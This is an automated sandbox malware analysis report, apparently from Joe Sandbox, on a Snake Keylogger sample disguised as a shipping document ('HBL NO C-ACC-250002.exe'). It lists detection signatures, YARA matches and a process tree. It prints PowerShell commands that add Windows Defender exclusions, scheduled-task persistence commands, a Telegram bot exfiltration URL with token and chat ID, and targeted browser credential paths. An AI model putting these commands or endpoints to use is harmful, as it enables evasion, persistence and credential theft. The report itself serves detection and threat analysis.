Edit tour

Windows Analysis Report
HBL NO C-ACC-250002.exe

Overview

General Information

Sample name:	HBL NO C-ACC-250002.exe
Analysis ID:	1631593
MD5:	bcc88695eb4028e33671f80ec957a01a
SHA1:	67564ac4019e2fde2e083d00f7effc5c63d48605
SHA256:	0231d2d9b4bc4935dd4eed396ec39b0a6ed73bf239ccb2a049424175e42b42ce
Tags:	exeSnakeKeyloggeruser-cocaman
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

HBL NO C-ACC-250002.exe (PID: 2164 cmdline: "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe" MD5: BCC88695EB4028E33671F80EC957A01A)

powershell.exe (PID: 6580 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1492 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uyDicX.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 2820 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 6524 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp61D1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

HBL NO C-ACC-250002.exe (PID: 1960 cmdline: "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe" MD5: BCC88695EB4028E33671F80EC957A01A)

uyDicX.exe (PID: 5144 cmdline: C:\Users\user\AppData\Roaming\uyDicX.exe MD5: BCC88695EB4028E33671F80EC957A01A)

schtasks.exe (PID: 3060 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp6EB2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

uyDicX.exe (PID: 6024 cmdline: "C:\Users\user\AppData\Roaming\uyDicX.exe" MD5: BCC88695EB4028E33671F80EC957A01A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7895118317:AAGrVh3BGkPztPIw30H4HXBbPxYmBtMiKV0/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7895118317:AAGrVh3BGkPztPIw30H4HXBbPxYmBtMiKV0/sendMessage?chat_id=5649235024", "Token": "7895118317:AAGrVh3BGkPztPIw30H4HXBbPxYmBtMiKV0", "Chat_id": "5649235024", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.4499608217.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.4499894132.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000E.00000002.4499608217.0000000003002000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000E.00000002.4499608217.0000000003002000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.4499894132.0000000002D84000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000002.4499894132.0000000002D84000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.4499894132.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000E.00000002.4499608217.0000000002F0C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1485d:$a1: get_encryptedPassword 0x14b49:$a2: get_encryptedUsername 0x14669:$a3: get_timePasswordChanged 0x14764:$a4: get_passwordField 0x14873:$a5: set_encryptedPassword 0x15f0c:$a7: get_logins 0x15e6f:$a10: KeyLoggerEventArgs 0x15ada:$a11: KeyLoggerEventArgsEventHandler
00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19842:$x1: $%SMTPDV$ 0x18214:$x2: $#TheHashHere%& 0x197ea:$x3: %FTPDV$ 0x181b4:$x4: $%TelegramDv$ 0x15ada:$x5: KeyLoggerEventArgs 0x15e6f:$x5: KeyLoggerEventArgs 0x1980e:$m2: Clipboard Logs ID 0x19a4c:$m2: Screenshot Logs ID 0x19b5c:$m2: keystroke Logs ID 0x19e36:$m3: SnakePW 0x19a24:$m4: \SnakeKeylogger\
0000000A.00000002.2125831840.0000000003D19000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2125831840.0000000003D19000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000A.00000002.2125831840.0000000003D19000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x15185:$a1: get_encryptedPassword 0x35ba5:$a1: get_encryptedPassword 0x563c5:$a1: get_encryptedPassword 0x15471:$a2: get_encryptedUsername 0x35e91:$a2: get_encryptedUsername 0x566b1:$a2: get_encryptedUsername 0x14f91:$a3: get_timePasswordChanged 0x359b1:$a3: get_timePasswordChanged 0x561d1:$a3: get_timePasswordChanged 0x1508c:$a4: get_passwordField 0x35aac:$a4: get_passwordField 0x562cc:$a4: get_passwordField 0x1519b:$a5: set_encryptedPassword 0x35bbb:$a5: set_encryptedPassword 0x563db:$a5: set_encryptedPassword 0x16834:$a7: get_logins 0x37254:$a7: get_logins 0x57a74:$a7: get_logins 0x16797:$a10: KeyLoggerEventArgs 0x371b7:$a10: KeyLoggerEventArgs 0x579d7:$a10: KeyLoggerEventArgs
0000000A.00000002.2125831840.0000000003D19000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1a16a:$x1: $%SMTPDV$ 0x3ab8a:$x1: $%SMTPDV$ 0x5b3aa:$x1: $%SMTPDV$ 0x18b3c:$x2: $#TheHashHere%& 0x3955c:$x2: $#TheHashHere%& 0x59d7c:$x2: $#TheHashHere%& 0x1a112:$x3: %FTPDV$ 0x3ab32:$x3: %FTPDV$ 0x5b352:$x3: %FTPDV$ 0x18adc:$x4: $%TelegramDv$ 0x394fc:$x4: $%TelegramDv$ 0x59d1c:$x4: $%TelegramDv$ 0x16402:$x5: KeyLoggerEventArgs 0x16797:$x5: KeyLoggerEventArgs 0x36e22:$x5: KeyLoggerEventArgs 0x371b7:$x5: KeyLoggerEventArgs 0x57642:$x5: KeyLoggerEventArgs 0x579d7:$x5: KeyLoggerEventArgs 0x1a136:$m2: Clipboard Logs ID 0x1a374:$m2: Screenshot Logs ID 0x1a484:$m2: keystroke Logs ID
00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x154c5:$a1: get_encryptedPassword 0x35ee5:$a1: get_encryptedPassword 0x56705:$a1: get_encryptedPassword 0x157b1:$a2: get_encryptedUsername 0x361d1:$a2: get_encryptedUsername 0x569f1:$a2: get_encryptedUsername 0x152d1:$a3: get_timePasswordChanged 0x35cf1:$a3: get_timePasswordChanged 0x56511:$a3: get_timePasswordChanged 0x153cc:$a4: get_passwordField 0x35dec:$a4: get_passwordField 0x5660c:$a4: get_passwordField 0x154db:$a5: set_encryptedPassword 0x35efb:$a5: set_encryptedPassword 0x5671b:$a5: set_encryptedPassword 0x16b74:$a7: get_logins 0x37594:$a7: get_logins 0x57db4:$a7: get_logins 0x16ad7:$a10: KeyLoggerEventArgs 0x374f7:$a10: KeyLoggerEventArgs 0x57d17:$a10: KeyLoggerEventArgs
00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1a4aa:$x1: $%SMTPDV$ 0x3aeca:$x1: $%SMTPDV$ 0x5b6ea:$x1: $%SMTPDV$ 0x18e7c:$x2: $#TheHashHere%& 0x3989c:$x2: $#TheHashHere%& 0x5a0bc:$x2: $#TheHashHere%& 0x1a452:$x3: %FTPDV$ 0x3ae72:$x3: %FTPDV$ 0x5b692:$x3: %FTPDV$ 0x18e1c:$x4: $%TelegramDv$ 0x3983c:$x4: $%TelegramDv$ 0x5a05c:$x4: $%TelegramDv$ 0x16742:$x5: KeyLoggerEventArgs 0x16ad7:$x5: KeyLoggerEventArgs 0x37162:$x5: KeyLoggerEventArgs 0x374f7:$x5: KeyLoggerEventArgs 0x57982:$x5: KeyLoggerEventArgs 0x57d17:$x5: KeyLoggerEventArgs 0x1a476:$m2: Clipboard Logs ID 0x1a6b4:$m2: Screenshot Logs ID 0x1a7c4:$m2: keystroke Logs ID
0000000E.00000002.4499608217.0000000002D41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.4499894132.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: HBL NO C-ACC-250002.exe PID: 2164	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: HBL NO C-ACC-250002.exe PID: 2164	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: HBL NO C-ACC-250002.exe PID: 2164	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: HBL NO C-ACC-250002.exe PID: 2164	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x41e2d:$a1: get_encryptedPassword 0x4210f:$a2: get_encryptedUsername 0x41c43:$a3: get_timePasswordChanged 0x41d3e:$a4: get_passwordField 0x41e43:$a5: set_encryptedPassword 0x4442c:$a7: get_logins 0x4438f:$a10: KeyLoggerEventArgs 0x43ffa:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: HBL NO C-ACC-250002.exe PID: 2164	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x43ffa:$x5: KeyLoggerEventArgs 0x4438f:$x5: KeyLoggerEventArgs 0x44f68:$x5: KeyLoggerEventArgs 0x452c9:$x5: KeyLoggerEventArgs 0x465c1:$m2: Clipboard Logs ID 0x466c7:$m2: Screenshot Logs ID 0x4671d:$m2: keystroke Logs ID 0x46852:$m3: SnakePW 0x466b3:$m4: \SnakeKeylogger\
Process Memory Space: HBL NO C-ACC-250002.exe PID: 1960	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: HBL NO C-ACC-250002.exe PID: 1960	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: HBL NO C-ACC-250002.exe PID: 1960	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: HBL NO C-ACC-250002.exe PID: 1960	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5f19d:$a1: get_encryptedPassword 0x5f47f:$a2: get_encryptedUsername 0x5efb3:$a3: get_timePasswordChanged 0x5f0ae:$a4: get_passwordField 0x5f1b3:$a5: set_encryptedPassword 0x6179c:$a7: get_logins 0x616ff:$a10: KeyLoggerEventArgs 0x6136a:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: HBL NO C-ACC-250002.exe PID: 1960	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x6136a:$x5: KeyLoggerEventArgs 0x616ff:$x5: KeyLoggerEventArgs 0x622d8:$x5: KeyLoggerEventArgs 0x62639:$x5: KeyLoggerEventArgs 0x63931:$m2: Clipboard Logs ID 0x63a37:$m2: Screenshot Logs ID 0x63a8d:$m2: keystroke Logs ID 0x3b18:$m3: SnakePW 0x7645:$m3: SnakePW 0x783b:$m3: SnakePW 0x7a3d:$m3: SnakePW 0x18c72:$m3: SnakePW 0x2f5f5:$m3: SnakePW 0x2fa22:$m3: SnakePW 0x2fd32:$m3: SnakePW 0x63bc2:$m3: SnakePW 0x63a23:$m4: \SnakeKeylogger\
Process Memory Space: uyDicX.exe PID: 5144	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: uyDicX.exe PID: 5144	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: uyDicX.exe PID: 5144	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: uyDicX.exe PID: 5144	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x779ac:$a1: get_encryptedPassword 0x77c8e:$a2: get_encryptedUsername 0x777c2:$a3: get_timePasswordChanged 0x778bd:$a4: get_passwordField 0x779c2:$a5: set_encryptedPassword 0x79fab:$a7: get_logins 0x79f0e:$a10: KeyLoggerEventArgs 0x79b79:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: uyDicX.exe PID: 5144	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x79b79:$x5: KeyLoggerEventArgs 0x79f0e:$x5: KeyLoggerEventArgs 0x7aae7:$x5: KeyLoggerEventArgs 0x7ae48:$x5: KeyLoggerEventArgs 0x7c140:$m2: Clipboard Logs ID 0x7c246:$m2: Screenshot Logs ID 0x7c29c:$m2: keystroke Logs ID 0x7c3d1:$m3: SnakePW 0x7c232:$m4: \SnakeKeylogger\
Process Memory Space: uyDicX.exe PID: 6024	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: uyDicX.exe PID: 6024	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: uyDicX.exe PID: 6024	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Click to see the 35 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c5d:$a1: get_encryptedPassword 0x12f49:$a2: get_encryptedUsername 0x12a69:$a3: get_timePasswordChanged 0x12b64:$a4: get_passwordField 0x12c73:$a5: set_encryptedPassword 0x1430c:$a7: get_logins 0x1426f:$a10: KeyLoggerEventArgs 0x13eda:$a11: KeyLoggerEventArgsEventHandler
0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a630:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19862:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c95:$a4: \Orbitum\User Data\Default\Login Data 0x1acd4:$a5: \Kometa\User Data\Default\Login Data
0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13850:$s1: UnHook 0x13857:$s2: SetHook 0x1385f:$s3: CallNextHook 0x1386c:$s4: _hook
0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c42:$x1: $%SMTPDV$ 0x16614:$x2: $#TheHashHere%& 0x17bea:$x3: %FTPDV$ 0x165b4:$x4: $%TelegramDv$ 0x13eda:$x5: KeyLoggerEventArgs 0x1426f:$x5: KeyLoggerEventArgs 0x17c0e:$m2: Clipboard Logs ID 0x17e4c:$m2: Screenshot Logs ID 0x17f5c:$m2: keystroke Logs ID 0x18236:$m3: SnakePW 0x17e24:$m4: \SnakeKeylogger\
0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c5d:$a1: get_encryptedPassword 0x12f49:$a2: get_encryptedUsername 0x12a69:$a3: get_timePasswordChanged 0x12b64:$a4: get_passwordField 0x12c73:$a5: set_encryptedPassword 0x1430c:$a7: get_logins 0x1426f:$a10: KeyLoggerEventArgs 0x13eda:$a11: KeyLoggerEventArgsEventHandler
0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a630:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19862:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c95:$a4: \Orbitum\User Data\Default\Login Data 0x1acd4:$a5: \Kometa\User Data\Default\Login Data
0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13850:$s1: UnHook 0x13857:$s2: SetHook 0x1385f:$s3: CallNextHook 0x1386c:$s4: _hook
0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c42:$x1: $%SMTPDV$ 0x16614:$x2: $#TheHashHere%& 0x17bea:$x3: %FTPDV$ 0x165b4:$x4: $%TelegramDv$ 0x13eda:$x5: KeyLoggerEventArgs 0x1426f:$x5: KeyLoggerEventArgs 0x17c0e:$m2: Clipboard Logs ID 0x17e4c:$m2: Screenshot Logs ID 0x17f5c:$m2: keystroke Logs ID 0x18236:$m3: SnakePW 0x17e24:$m4: \SnakeKeylogger\
10.2.uyDicX.exe.3d3a148.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.uyDicX.exe.3d3a148.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
10.2.uyDicX.exe.3d3a148.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c5d:$a1: get_encryptedPassword 0x12f49:$a2: get_encryptedUsername 0x12a69:$a3: get_timePasswordChanged 0x12b64:$a4: get_passwordField 0x12c73:$a5: set_encryptedPassword 0x1430c:$a7: get_logins 0x1426f:$a10: KeyLoggerEventArgs 0x13eda:$a11: KeyLoggerEventArgsEventHandler
10.2.uyDicX.exe.3d3a148.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a630:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19862:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c95:$a4: \Orbitum\User Data\Default\Login Data 0x1acd4:$a5: \Kometa\User Data\Default\Login Data
10.2.uyDicX.exe.3d3a148.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13850:$s1: UnHook 0x13857:$s2: SetHook 0x1385f:$s3: CallNextHook 0x1386c:$s4: _hook
10.2.uyDicX.exe.3d3a148.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c42:$x1: $%SMTPDV$ 0x16614:$x2: $#TheHashHere%& 0x17bea:$x3: %FTPDV$ 0x165b4:$x4: $%TelegramDv$ 0x13eda:$x5: KeyLoggerEventArgs 0x1426f:$x5: KeyLoggerEventArgs 0x17c0e:$m2: Clipboard Logs ID 0x17e4c:$m2: Screenshot Logs ID 0x17f5c:$m2: keystroke Logs ID 0x18236:$m3: SnakePW 0x17e24:$m4: \SnakeKeylogger\
10.2.uyDicX.exe.3d19728.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.uyDicX.exe.3d19728.3.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
10.2.uyDicX.exe.3d19728.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c5d:$a1: get_encryptedPassword 0x12f49:$a2: get_encryptedUsername 0x12a69:$a3: get_timePasswordChanged 0x12b64:$a4: get_passwordField 0x12c73:$a5: set_encryptedPassword 0x1430c:$a7: get_logins 0x1426f:$a10: KeyLoggerEventArgs 0x13eda:$a11: KeyLoggerEventArgsEventHandler
10.2.uyDicX.exe.3d19728.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a630:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19862:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c95:$a4: \Orbitum\User Data\Default\Login Data 0x1acd4:$a5: \Kometa\User Data\Default\Login Data
10.2.uyDicX.exe.3d19728.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13850:$s1: UnHook 0x13857:$s2: SetHook 0x1385f:$s3: CallNextHook 0x1386c:$s4: _hook
10.2.uyDicX.exe.3d19728.3.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c42:$x1: $%SMTPDV$ 0x16614:$x2: $#TheHashHere%& 0x17bea:$x3: %FTPDV$ 0x165b4:$x4: $%TelegramDv$ 0x13eda:$x5: KeyLoggerEventArgs 0x1426f:$x5: KeyLoggerEventArgs 0x17c0e:$m2: Clipboard Logs ID 0x17e4c:$m2: Screenshot Logs ID 0x17f5c:$m2: keystroke Logs ID 0x18236:$m3: SnakePW 0x17e24:$m4: \SnakeKeylogger\
10.2.uyDicX.exe.3d3a148.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.uyDicX.exe.3d3a148.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
10.2.uyDicX.exe.3d3a148.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a5d:$a1: get_encryptedPassword 0x3527d:$a1: get_encryptedPassword 0x14d49:$a2: get_encryptedUsername 0x35569:$a2: get_encryptedUsername 0x14869:$a3: get_timePasswordChanged 0x35089:$a3: get_timePasswordChanged 0x14964:$a4: get_passwordField 0x35184:$a4: get_passwordField 0x14a73:$a5: set_encryptedPassword 0x35293:$a5: set_encryptedPassword 0x1610c:$a7: get_logins 0x3692c:$a7: get_logins 0x1606f:$a10: KeyLoggerEventArgs 0x3688f:$a10: KeyLoggerEventArgs 0x15cda:$a11: KeyLoggerEventArgsEventHandler 0x364fa:$a11: KeyLoggerEventArgsEventHandler
10.2.uyDicX.exe.3d3a148.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c430:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cc50:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b662:$a3: \Google\Chrome\User Data\Default\Login Data 0x3be82:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba95:$a4: \Orbitum\User Data\Default\Login Data 0x3c2b5:$a4: \Orbitum\User Data\Default\Login Data 0x1cad4:$a5: \Kometa\User Data\Default\Login Data 0x3d2f4:$a5: \Kometa\User Data\Default\Login Data
10.2.uyDicX.exe.3d3a148.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15650:$s1: UnHook 0x35e70:$s1: UnHook 0x15657:$s2: SetHook 0x35e77:$s2: SetHook 0x1565f:$s3: CallNextHook 0x35e7f:$s3: CallNextHook 0x1566c:$s4: _hook 0x35e8c:$s4: _hook
10.2.uyDicX.exe.3d3a148.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a42:$x1: $%SMTPDV$ 0x3a262:$x1: $%SMTPDV$ 0x18414:$x2: $#TheHashHere%& 0x38c34:$x2: $#TheHashHere%& 0x199ea:$x3: %FTPDV$ 0x3a20a:$x3: %FTPDV$ 0x183b4:$x4: $%TelegramDv$ 0x38bd4:$x4: $%TelegramDv$ 0x15cda:$x5: KeyLoggerEventArgs 0x1606f:$x5: KeyLoggerEventArgs 0x364fa:$x5: KeyLoggerEventArgs 0x3688f:$x5: KeyLoggerEventArgs 0x19a0e:$m2: Clipboard Logs ID 0x19c4c:$m2: Screenshot Logs ID 0x19d5c:$m2: keystroke Logs ID 0x3a22e:$m2: Clipboard Logs ID 0x3a46c:$m2: Screenshot Logs ID 0x3a57c:$m2: keystroke Logs ID 0x1a036:$m3: SnakePW 0x3a856:$m3: SnakePW 0x19c24:$m4: \SnakeKeylogger\
10.2.uyDicX.exe.3d19728.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.uyDicX.exe.3d19728.3.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
